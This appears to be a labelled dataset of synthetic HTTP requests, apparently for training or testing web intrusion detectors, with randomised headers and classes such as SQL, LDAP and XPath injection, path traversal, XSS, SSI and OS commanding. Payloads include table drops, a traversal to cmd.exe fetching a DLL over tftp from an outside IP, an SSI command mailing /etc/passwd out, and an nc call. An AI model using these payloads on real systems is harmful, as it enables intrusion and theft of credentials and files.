If-Unmodified-Since: Sun, 01 May 05 03:29:42 CET
If-Match: *
If-None-Match: "3X65fxKnxeYPp5ve5JV"
If-Range: Thu, 04 Mar 04 09:36:04 GMT
Max-Forwards: 90
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=noaen
Authorization: NTLM dG43dUlpZnNkdGVyeWVxaWZvaXNpb3NhcnRpY3dhcU9hc2F1c2dhZWVvYQ==
Range: 354-,63882-
Referer: http://www.xsbn.com/dufatney/2fyzlibb/6efdLese/sewiSgeD/ddfunR.wav
TE: trailers,gzip;q=0.7,deflate;q=0.8
Trailer: Upgrade
User-Agent: c_SmX_e http://www.IisZmh5m.gov
UA-CPU: MIPS
UA-Disp: 3246,785,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: 8.0 9.172.27.77, HTTP/8.6 www.hhlqse.png, 9ti/3.8 54.63.61.109
Transfer-Encoding: gzip
Upgrade: paa/8.6, yprO/1.1
Warning: 882 118.217.63.222 "etpoiZeexEopAili8v" 
X-Forwarded-For: 62.58.132.17
X-Serial-Number: 8223453
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45500
Start - Id: 35298
class: SqlInjection
GET /uee3e8c/vreatA9ln7dmee3pDHrV/rh9TGyG5Ofnn/aNp4kGtXkTu_nM/kc/n.Zlq453NE0.jsp?fdo=he&enqcs=22431139&bF7K=872563430&ndioisteE8neis=7&kwrsms7b=Cs+ba%3A%7Eusredn%3Bhwetce-n&sdtiecf=%27%3B++begin++declare++%40ret+++++varchar%288000%29+++++set++%40ret%3D%27%3A%27+select+++%40ret%3D%40ret%2B%27+++%27%2BetBerlhd%2B%27%2F%27%2Bpassword+++from+0iocj++where++++ow%3E%40ret+select+++++%40ret+++++as+++++ret++into+++++foo++end--&acceptbu59@wwget=bhdfromn&hah6goooE1o=4879466&Lpe=pteese7hb&andon4ebeHl=ehrR0iietleemtsRy&nm=7&awhsE=857562&nwoueoatpctrsTr=1130&i9KcKeF=53 HTTP/1.1
Host: www.eAKh.fr:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: identity
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 213.3.132.26
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="0"
Date: Wed, 02 Aug 06 09:28:42 UTC
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: 100-continue
From: bohfsrn3@6agvleeeda.com
If-Modified-Since: Sun, 01 Oct 06 22:21:25 UTC
If-Unmodified-Since: Fri, 24 Nov 06 01:20:17 CET
If-Match: "@Rz5jkyRfCO5NwkJ0P"
If-None-Match: "nKhvYL@HW57.tz6."
If-Range: "9Me-gDD9gfiCN5PioDce"
Max-Forwards: 86
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="wwob"
Authorization: Digest nonce
Range: 930-456,2355-
Referer: /bmxml/Jvarq.doc
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/0.6 (Windows; U; WinNT 3.2; vt-er; rv:7.9.0) Gecko/91981791
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 048x605
Via: 7c4/0.5 www.l4jo36ex.gif:1, aypN/6.3 www.ehtaaloz.html, HTTP/6.6 www.soeo.shtml
Transfer-Encoding: deflate
Upgrade: dn44o/1.3
Warning: 350 4.215.62.223 "thrrt0nq8ftawYt2rl5" "Sun, 30 Nov 08 19:51:23 GMT"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 019195237
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35298
Start - Id: 36885
class: LdapInjection
GET /ii6mRmn61eenl/yW/wnrsn/QZ.cfm?tnxeSlauno=5919976525&HzJS=+SaSrlh%28e+ws HTTP/1.1
Host: 203.32.5.250
Connection: ees4hnht
Accept: audio/basic
Accept-Charset: x-mac-chinesetrad;q=0.0, us-ascii, shift_jis, windows-1252;q=0.4, x-mac-greek
Accept-Encoding: *;q=0.4
Accept-Language: nEumO-aOOe, nrg2hn7-uwHra;q=0.3, p-o;q=0.1, bnkcbn-qeehas;q=0.4, wE6-iayomtl
Cache-Control: max-age=2116
Client-ip: 139.174.236.37
Cookie: vhbqqse=97)(&(objectClass=Cre6)(|(sn =   uo)(cn=mera     J*));pOnieeeno=eu;CWPE7U7Gp5=khomeetmpz
Cookie2: $Version="1"
Date: Fri, 27 Jan 06 15:23:39 GMT
ETag: W/"KCI@kN0BmfRCknwK6xXS"
From: god7on@cdae.de
If-Modified-Since: Mon, 26 Apr 10 21:03:08 GMT
If-Unmodified-Since: Sat, 17 Apr 10 20:34:08 UTC
If-Match: *
If-None-Match: "uOHLxNdhG6qEGhKK3N"
If-Range: Fri, 09 Oct 09 19:00:34 CET
Max-Forwards: 513
MIME-Version: 7.4
Pragma: U=ensybn1b
Proxy-Authorization: Digest nonce
Authorization: NTLM UlI2bnA0cnRITWU4MWtDZWF5RGRkc3dzaTdibmFlbG5sb2l0cGZndGV0aGxzc24=
Range: 0197-,73847-461778
Referer: http://www.bdrEue.fr/6tSt.mdb
TE: trailers
User-Agent: oyhtlp
UA-Disp: 6316,185,8
Via: 3.9 35.41.75.226, 9.4 www.snechnne.gif, 2.3 www.TsoeoEa.png
Upgrade: E4o6/0.9
Warning: 873 www.uz4i3.js "138m9djRanlflt" "Tue, 02 May 06 22:00:02 CET"
----: ----------------------------------------

null

End - Id: 36885
Start - Id: 45858
class: PathTransversal
GET /jmalwzmt8n2tlnf/Y4sw/thasvh/ttfnuEar.bin?uEtRR=1telry&0XmkA=2&ahEof8nbbn=1rtih4twe&knteip=18090&dya7otzo=wp-c%26t&ees=dVrk&fao1=rrh1hara7&ke=2229672&orn=%5Bcoo&a9rtsuUx=760416&hsieeloo9s=%5Cautoexec.bat&aO=i+u HTTP/1.1
Host: 141.76.189.25
Connection: naoc4
Accept: image/*;q=0.4, image/*
Accept-Charset: iso-10646-ucs-2;q=0.5, x-mac-japanese, x-mac-chinesetrad;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 136.24.127.56
Cookie: cByY=9;etpFenqaPadn=Ke2tlDHi;lhog=3509968;ane6yua=t08wQ
Cookie2: $Version="19"
Date: Wed, 06 Apr 05 15:55:04 GMT
ETag: "6xdolW3VdGfzPmhayV"
Expect: 3t4iuofm=tNbmsLip
From: teqnen@eMOfb.uk
If-Modified-Since: Sun, 01 Aug 04 14:09:35 CET
If-Unmodified-Since: Wed, 14 Mar 07 03:22:03 GMT
If-Match: "ogU8zhidaSc5MVa"
If-None-Match: *
If-Range: Mon, 09 Jan 06 22:46:10 UTC
Max-Forwards: 2405
MIME-Version: 2.1
Pragma: 02Twseeu='b7e'
Proxy-Authorization: NTLM YW92MnNzYWEwU0JobkFhbnlBZ2VjdDF0cmljZm43cHFFc2xydXJubVJudHBa
Authorization: Digest uri=/doti8/eosjyiik.exe
Range: 81947-,357703-
Referer: http://lImre40u.fr/rhed6t/wr9ROo/gaodrhm/eison0/8baon.js
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: Hothsae
UA-CPU: Sparc
UA-Disp: 096,9977,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0549x672
Via: 0.7 38.167.209.8:07939, FTP/9.9 51.4.112.140, HTTP/7.0 www.ondslyip.css
Transfer-Encoding: deflate
Upgrade: eAm77t/3.2, rcioQv/9.7, fitc/1.5
Warning: 078 www.eFerJs.html:545 "nhptoteG" 
X-Forwarded-For: 239.104.254.12
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45858
Start - Id: 48620
class: XPathInjection
PUT /rsU5Y9sHperl@HXm7/SMG.png? HTTP/1.0
Content-Length: 200
Content-Language: onskr,tyuotr8,hrf
Content-Encoding: compress
Content-Location: http://kw5dcej.gov/eiOiEp/cnppxait/wojin/uDMae/akcts.rar
Content-MD5: ZWlsdHU4NGV0c3BhaWFudA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Apr 09 10:15:52 UTC
Last-Modified: Sat, 30 Sep 06 01:43:18 CET
Host: 130.23.144.71
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 62.48.219.126
Cookie: sso=alyZPpBUO;C.CAqdwTYq5=ujtm3eera;eteuso9ogaesls=y3ggtsd;yltqxT=gZ6a
Cookie2: $Version="07"
Date: Tue, 12 Sep 06 01:22:28 UTC
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: 100-continue
From: ewioailt@flio7hb.com
If-Modified-Since: Wed, 16 Jun 04 13:07:44 GMT
If-Unmodified-Since: Sat, 24 Nov 07 12:47:26 GMT
If-Match: "BYvSWUPhani0Q3YK"
If-None-Match: *
If-Range: *
Max-Forwards: 02
MIME-Version: 7.4
Pragma: iuide9='Wte5at'
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: NTLM RTVsbm9vbnNjT2RmZWhpbmx4bHNFdmJodWRyZXRhc3JvZjg3bw==
Range: 939-64,563448-00397,65796-
Referer: http://stelets.ch/aeidToe/isdT/str2n/Nsbd.png
TE: deflate;q=0.2
Trailer: Referer
User-Agent: Mozilla/8.4 (compatible; MSIE 3.8; Unix; aminqIw; Hetaa)
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: l1u/7.1 www.eb11nnua.js
Transfer-Encoding: hned
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nhaTbnaenailn=eatmpnbSnt@K&qooeaoryvLyrop=m5ecOr&ctglemtvlnnjs=15901144&ns1alelsPnze=urdhloe' or   6    <     count(path/child::*)  or 'une'   =    '&0hr=06&etrwNje=4Iy.n0VtJTa

End - Id: 48620
Start - Id: 44290
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
Host: 84.5.33.96
Connection: oailg5
Accept: */*;q=0.3
Accept-Charset: koi8-r, x-mac-chinesesimp
Accept-Encoding: *;q=0.8
Accept-Language: 18-0hncpbt, ihzse-etie, hthn-w, no6o-seftHc3, 4sgoiod-qnras
Cache-Control: no-cache
Client-ip: 171.2.10.60
Cookie: psc=tm;lunionWkAVku7.=668483
Cookie2: $Version="0"
Date: Sat, 01 May 04 23:25:58 CET
ETag: "b_1HVy3bbCtIipID7"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Thu, 21 Dec 06 03:26:43 CET
If-Unmodified-Since: Fri, 15 Oct 04 22:01:25 UTC
If-Match: *
If-None-Match: "sXzhETLzaX4W4CVxSK1S"
If-Range: "iROizBQS@Y28_D1aeg9"
Max-Forwards: 999
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM b1dmc2ZsdHh6cmV0d2F0dDlsYmlkYWhpc2lrcW5kYWFlOHJ1Zw==
Authorization: wnaeh oheL=ooeioN
Range: 77-00,194-
Referer: /dnCo/fiks/ntoyt/yGnrn.php4
TE: gzip,chunked;q=0.7,trailers
Trailer: If-Match
User-Agent: nDuetiii/1.8.9.2
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0573x2598
Via: HTTP/6.9 211.239.45.113:8, 0.0 194.209.88.115
Transfer-Encoding: Oserkm; tohe=lu8n
Upgrade: Aers/1.0, riij1i/9.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 11968
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44290
Start - Id: 48206
class: XSS
PUT /rL.mdb? HTTP/1.1
Content-Length: 146
Content-Language: SzDrcEa
Content-Encoding: deflate
Content-Location: http://org66.uk/aao7mat/binj.conf
Content-MD5: NWxxZ3N5ZWl1YW90eHNueg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Jun 08 03:25:41 CET
Host: 16.127.255.63:814
Connection: euhhre
Accept: audio/*, text/*;q=0.3, audio/*
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.8, compress;q=0.1, compress, identity;q=0.5, identity
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 104.211.94.210
Date: Mon, 16 Feb 09 14:06:59 UTC
Expect: iQbird
If-Match: *
If-None-Match: *
Max-Forwards: 5
Pragma: oohi=jsll
Authorization: Basic YUJlaWV1OlNwYWw=
Referer: http://www.nactr.net/talx3le.avi
TE: deflate,gzip,trailers
User-Agent: <div   style = "binding:  url([http://www.olal.com/script/rtt.php3]);    "   >
UA-Pixels: 2557x0166
Via: HTTP/1.1 www.auht.jpeg, 3.6 www.POAilao8.css, HTTP/1.0 186.252.91.154
Transfer-Encoding: identity
Warning: 893 78.20.40.155 "h9rlthiE7eebet5grc" 
X-Forwarded-For: 16.22.84.83
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ssock_stream22q8script=rEah&udssevahnIse=lHE (fd=&ye=l&i7rnr&GVf33Cj9wVS=Nwtomriua&lre=39336&guroeyawRlAl7e=ecpe&ets5h=D@m&ocaweineii=3434

End - Id: 48206
Start - Id: 43063
class: OsCommanding
POST /lstdr/Aqeetc/9dhe8/nZNAYvu/cheIerE/petah0ets4ugbt4Oeh/p7SOnkp@/hjhIpN0.3it.dll? HTTP/1.0
Content-Length: 232
Content-Language: vgl,aml,r
Content-Encoding: gzip
Content-Location: http://4gCunSq.de/iRlt/c3me3n.cgi
Content-MD5: dFludHRzYWlpaGh0YW1sdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 Aug 09 11:34:51 CET
Last-Modified: Sat, 08 Jul 06 24:33:46 GMT
Host: 164.140.73.214:78
Connection: ioxft
Accept: */*
Accept-Charset: koi8;q=0.5, us-ascii, iso-8859-8
Accept-Encoding: identity, deflate;q=0.3, gzip
Accept-Language: j3-rtt
Cache-Control: no-cache
Client-ip: 38.62.165.132
Cookie: e6oyoKAnw2c=it5nshutdown=oM;qiLTyKfNaZkI=420907
Cookie2: $Version="48"
Date: Mon, 09 May 05 12:16:53 UTC
ETag: W/"QXl@Wqluj0HKLJ.8Ikl"
Expect: 100-continue
From: sTleEdu@dtAttFd.de
If-Modified-Since: Sat, 20 Nov 04 01:53:46 UTC
If-Unmodified-Since: Tue, 08 May 07 04:09:25 CET
If-Match: "QL1Ivc@iqjP4N6rHlA8"
If-None-Match: "_eNPjrb3jxnMW0ToH"
If-Range: Thu, 18 Sep 08 08:59:25 CET
Max-Forwards: 0607
MIME-Version: 1.8
Pragma: i0nedc5='eiy'
Proxy-Authorization: wswe njne=Ot3enhto
Authorization: Basic cGFrZVNsTzpvZWZ0MzR3aQ==
Range: -86761,779-
Referer: /nina8dr/aee7H.dll
TE: deflate
Trailer: Accept
User-Agent: Mozilla/8.5 (compatible; Konqueror/3.2; Linux i586; neFsa0oort)
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: oeni/1.6 69.127.27.89:082
Transfer-Encoding: rrr0; aExi=ctaj
Upgrade: tun3o/7.3, omna/4.0
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 206096711388693916
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

enNre4ftoS=65&uudsi9x=SahcstwErn&pAfu8mn4st=7777367925&Oss2b7eSar=%0a  nc    www.litise.com 80  ;&4ateoaiE4ae0fi=lAMzRYo&rsixE=ngatb0rftnctene8&iirUef9hnsbopr= &KaFkWgtQxQ0=N&eiRrcrBiP@I3=843353&yZ1serviceshicAYv=as6hzswsalionws

End - Id: 43063
Start - Id: 40019
class: SSI
GET /5qysXqA3dWbw1h5iRrsL/PLiSr/Rs2.htm?eaEd82tzr=eska&rta=tq1j%2Bajet5k&n8t97TeRehap=O&No=n7oolCxheicebs2&6qRW=lS_iEWl&ittits=5&cde=4520&tbte3gesai2=%3C%21--++++%23exec++++cmd%3D%22%2Fbin%2Fmail+++oom.com+%3C+++++%2Fetc%2Fpasswd%22--%3E&0aupdateideleteesbv=%5Cn03tf0ai&Ehppytnbsrati=edpheorcpr+NA3rmail&qmei9pzae=+2ea HTTP/1.1
Host: www.tluaE4t.uk
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, identity
Accept-Language: *
Cache-Control: hqe='waacbh'
Client-ip: 127.220.53.41
Cookie: paoepinA=0;0ammferqoEc=76;C2mjshutdown=doomtlmxeonsesbDt;b4t8OEUnbilm=h1)i3sb  ae;nEioidIctng=7442;amyzwio=1144
Cookie2: $Version="063"
Date: Wed, 12 Nov 08 02:33:42 GMT
ETag: W/"M_ybmZVvZ2LN3u7elOw"
Expect: 100-continue
From: l1ahde@nablau.fr
If-Modified-Since: Wed, 25 Aug 04 17:54:14 GMT
If-Unmodified-Since: Sun, 14 Sep 08 15:30:10 UTC
If-Match: "3rmep4jMK7lbYFV@"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 9.8
Pragma: t=xsA3namm
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: rnefn thutlu0=teulA
Range: -382094,59133-7365
Referer: http://av4995.st/RseTux/taRqtei2/thmtq/Aousne2/endb.js
TE: trailers,deflate;q=0.0
Trailer: Cache-Control
User-Agent: dneos (eQXrqhbWd; pNmquVYSwP; esgnIYW; 4z_V6E8Z; nL1jrPj)
UA-CPU: Sparc
UA-Disp: 270,463,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 4.6 207.75.71.140
Transfer-Encoding: gzip
Upgrade: temy/8.7, Aane0/2.7, d4ta/9.2
Warning: 858 65.172.196.46 "sae0vvsyhhdctrb" 
X-Serial-Number: 18116
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40019
Start - Id: 39718
class: SSI
GET /5ETFdwget14vlike/s4lo2bctawDfne/-ut1.YV_/isHaa6xes5a/lKAmmPZp2GUK3uW/nenriteNrsceiooemWr/e-3_4nLH8Bc.jpg?7Q0kMCR0=219222&maaGlsin2ot=e&fesh7c=gPq&ruseohelie=hjrl%24r3oh%3A%3Fsl&kZ56.N_=8&aeaoegrh=%3C%21--%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&alEt3ectewe=s9L5tVS_WiT&gn3X=2&6@0x=581 HTTP/1.1
Host: www.gunares.be:80
Connection: r8bhmtc
Accept: image/*;q=0.0
Accept-Charset: utf-7, x-mac-chinesetrad;q=0.4
Accept-Encoding: compress, gzip;q=0.6
Accept-Language: niw-Ea, cnc-h0ai;q=0.3
Cache-Control: no-store
Client-ip: 201.153.47.247
Cookie: tnc=2;ts5nr9x=128;etr=92789
Cookie2: $Version="372"
Date: Thu, 15 Jul 04 09:21:34 UTC
ETag: "S3drG_PYWSBZhlFGgd0W"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Sat, 20 Jun 09 17:08:15 UTC
If-Unmodified-Since: Tue, 10 Mar 09 05:27:13 CET
If-Match: ".EbmB.K54B80ugH"
If-None-Match: *
If-Range: "LMELrdm0q4y3CH.e"
Max-Forwards: 2811
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest nc=CBADdAaC
Authorization: XeNf iCvdN=RAefoje
Range: 61-,98874-5,222224-
Referer: http://www.kEsfsmtp.net/macdo5er/i7la4/je0hnnL/leol2u.tar.gz
TE: trailers
Trailer: Host
User-Agent: eoVbn (8QkJnWHbe; lvV5CS; gP6jk7W)
UA-CPU: x86
UA-Disp: 3264,053,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 066x3039
Via: 0.1 211.223.169.217
Transfer-Encoding: eeay; e5zjrlea=rueea
Upgrade: eoe/8.5, rhosn/0.5, slnwao/7.8
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 227.157.179.153
X-Serial-Number: 9911764547155
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39718
Start - Id: 43628
class: OsCommanding
POST /7knoocequtin/ASmfi/a7tw/aiih/EreMEeQrtsEw0wmhw/iXJQN@oH1NEeAJ9D/gcRXNv4cAEZ_vtmkzaw/vtyuSqsantu.php4? HTTP/1.0
Content-Length: 112
Content-Language: o2,oais
Content-Encoding: compress
Content-Location: /temtT2iA/a8mnn/04we2.dll
Content-MD5: RXJuZEVQYXVyb21TOWloOQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 11 Jul 06 12:02:35 UTC
Host: www.a3iLe.biz:567
Connection: yaldys9t
Accept: application/*
Accept-Charset: *
Accept-Encoding:      ; echo    ;  w        ;   uname   -a     ; id
Accept-Language: te-hRSt9
Cache-Control: min-fresh=4
Date: Thu, 15 Feb 07 06:02:29 UTC
ETag: "Rv1LLSK7-v.hQZkKgvvd"
Expect: keid=ot9eB
If-Modified-Since: Thu, 31 May 07 07:38:34 UTC
If-Unmodified-Since: Fri, 08 Jan 10 19:04:35 GMT
If-Match: "qVXi9vXDCty5FWKpx"
If-None-Match: "r2iqMX2XQFOkm_IDvq3r"
If-Range: Mon, 05 Sep 05 04:21:28 CET
Max-Forwards: 150
Proxy-Authorization: Basic QWxyaXJBYTpaZWZi
Referer: /ineda/re8lancn.txt
User-Agent: egTlomeqfeieesmr
Transfer-Encoding: deflate
Upgrade: ioUL/8.7, mwhe/5.7, s80I/2.4
Warning: 047 www.eshezI.shtml "yosEgrnaD8dhigeecbst" 
X-Forwarded-For: 149.148.1.115
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

@tr@=tfPznvq&ahxU4o=l@zu&ivlfngtrme1r8te=9&.R9kv=nsqKjG6Z2sxL&itDnoh20eMl6aet=neeriaer1mNoo7t&CxdMV=h7eusdseak

End - Id: 43628
Start - Id: 45706
class: PathTransversal
GET /iir3ohw.htm?Ed43=jlkDtR&venziitAi=235&vaASDwAH=770588&shon=q10pFf%3B%5Ct1epaisiOn&uuaeirN2aIheirM=deletesu&tuWergCw=inC&Hdr=3&oFh0kettuse0lr7=eY1eo_r&eeeiwHrdw=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&kai5hiare=6981204721&4nrnuebSRs6OMi=92&detobxT=8906&tg=ary2n3d%3F HTTP/1.1
Host: 75.89.225.231
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15, iso-8859-1
Accept-Encoding: deflate, compress, identity;q=0.4
Accept-Language: ot-o3cM, 7fOh0alt-OrhE3sr;q=0.9, nacAVn-f
Cache-Control: no-transform
Client-ip: 8.138.141.106
Cookie: 9d=u6GUD705
Cookie2: $Version="894"
Date: Sun, 04 Jul 04 13:30:13 GMT
ETag: "2j2pLmGkE8-lE0K5GK"
Expect: 100-continue
From: eajtut@smge.gov
If-Modified-Since: Sun, 23 Apr 06 15:47:38 CET
If-Unmodified-Since: Mon, 17 Apr 06 14:47:18 GMT
If-Match: *
If-None-Match: "uCmYFFYx004KMs_I-TE"
If-Range: *
Max-Forwards: 13
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic b3VyZ2NvZTppaHNy
Range: 8441-
Referer: http://www.Omkc3r.be/rcmek.jpg
TE: trailers,chunked;q=0.3,trailers
Trailer: Cache-Control
User-Agent: l6iws8ls5drtrId
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 967x7308
Via: HTTP/8.6 www.rr8w.css, 0.1 186.99.51.155
Transfer-Encoding: pnvti; lsje=rhoslifs
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45706
Start - Id: 41692
class: SqlInjection
GET /nFvn1/lcov.gif?IvteanRd=having%289fefenhxml%24cat%29%40&dsmtieriUan0tn=ps.O&oilme=%27%3B+++++drop+++table+ovrlH HTTP/1.1
Host: 23.103.146.25
Connection: aeieort
Accept: application/zip
Accept-Charset: *
Accept-Encoding: *
Accept-Language: aj-ehd, ih-soat;q=0.5, onrneswi-ah6o;q=0.1
Cache-Control: no-transform
Client-ip: 173.78.32.144
Cookie: Pc8d_sQ.P3=llsl8ndhyiIc
Cookie2: $Version="821"
Date: Sun, 23 Oct 05 05:08:44 UTC
ETag: "rLGxCggwtE@E2OyW"
Expect: urn9xa
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sat, 01 Sep 07 11:30:45 CET
If-Unmodified-Since: Sun, 25 Apr 10 23:19:21 GMT
If-Match: "xoPSHlY2Od6._xoDTKi"
If-None-Match: *
If-Range: Fri, 16 Nov 07 05:37:04 CET
Max-Forwards: 2613
MIME-Version: 2.8
Pragma: epclvt=cenw
Proxy-Authorization: Digest opaque="orot6"
Authorization: Aato8 oEoat=n1i8daro
Range: 271923-
Referer: http://www.sstwb.net/moimai.bin
TE: gzip
Trailer: Authorization
User-Agent: lfen7mar (nfWviWF@)
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0003x3071
Via: HTTP/7.0 www.meaeosto.jpg, hho/8.4 www.ssse.htm, FTP/9.8 www.p0iz3.png
Transfer-Encoding: ciwyit
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 200.2.71.249
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41692
Start - Id: 49392
class: XPathInjection
GET /rrxsneIroah/jew0cdrryFitnrdcmRx/odtL/ot5aeI/nZnSZOXF/0Qj/tw8t/upYy2/hr6oeh8nCLe/DuptalFma6entzsi/1FmuClB.vK_Xo5c/gdkr9zsltnMraoec8f.asmx?@DGwS@=cmdeugt&1ModdXnj-0=%5Be4s8eh2+nynig&iiecnrmssin=t.Fm8urT0S-O&snfou=Fmbh%27++or+1%3C++rstj%2Faetr%2Fed%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D99%5D+or+%27oT%27++%3D++++%27 HTTP/1.1
Host: 29.202.235.99
Connection: close
Accept: application/postscript;q=0.5, text/*;q=0.2, application/zip
Accept-Charset: x-mac-chinesetrad, utf-8;q=0.9, utf-8, koi8-r;q=0.0
Accept-Encoding: *
Accept-Language: khalRI-jmae;q=0.9, c8roH-tnAh, h-t;q=0.7
Cache-Control: ezs='anojsgum'
Client-ip: 232.182.22.65
Cookie: aylxyMNlE=ehurugc
Cookie2: $Version="461"
Date: Sat, 05 Feb 05 13:38:33 CET
ETag: W/"2TMjTj3nMjRhbDH037L"
Expect: Mt3seamr
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Fri, 14 Jul 06 16:04:38 UTC
If-Unmodified-Since: Sun, 15 Jun 08 19:51:33 GMT
If-Match: *
If-None-Match: "dik.EqXQFM_fBIU"
If-Range: Sat, 12 Dec 09 19:17:27 UTC
Max-Forwards: 4
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: NTLM dW9scG1od29zb2VpYW5FbnJqdGYxbkk0OGJldnNpcGlo
Range: 67912-847396,-254666,29-
Referer: /httosi/7reaetnm.cgi
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Range
User-Agent: Mozilla/5.7 (X11; U; Open BSD i586 4.8; xr-tg; rv:6.3.2) Gecko/00499165
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0695x2392
Via: 1.8 www.umzTgaqd.jpg, 9.5 www.DnLd.gif
Transfer-Encoding: t5jnee
Upgrade: goiteB/8.3
Warning: 873 179.220.247.176 "a53nepbizi" 
X-Forwarded-For: 71.48.20.140
X-Serial-Number: 9327975536472
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49392
Start - Id: 36032
class: PathTransversal
GET /vJvFFGfxmlzoGZ7x/oobktoofibaeleJm/t5fQS.vu@iABV2CPlhu/_vR/8s/apezci/enae2tUaasIntan/30oiueabMieEwectD/s6CndD@K/Twa6/lcw9OEsfbu-Q_7Dn/iP6yDIxKjyn.asp?5B4tphimdggr=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&aaslnGtee=8961&zoawnhDe=0%25%3Ea&itRrzrth=202284&nph5=iframeweeeval HTTP/1.1
Host: 75.0.20.225:80
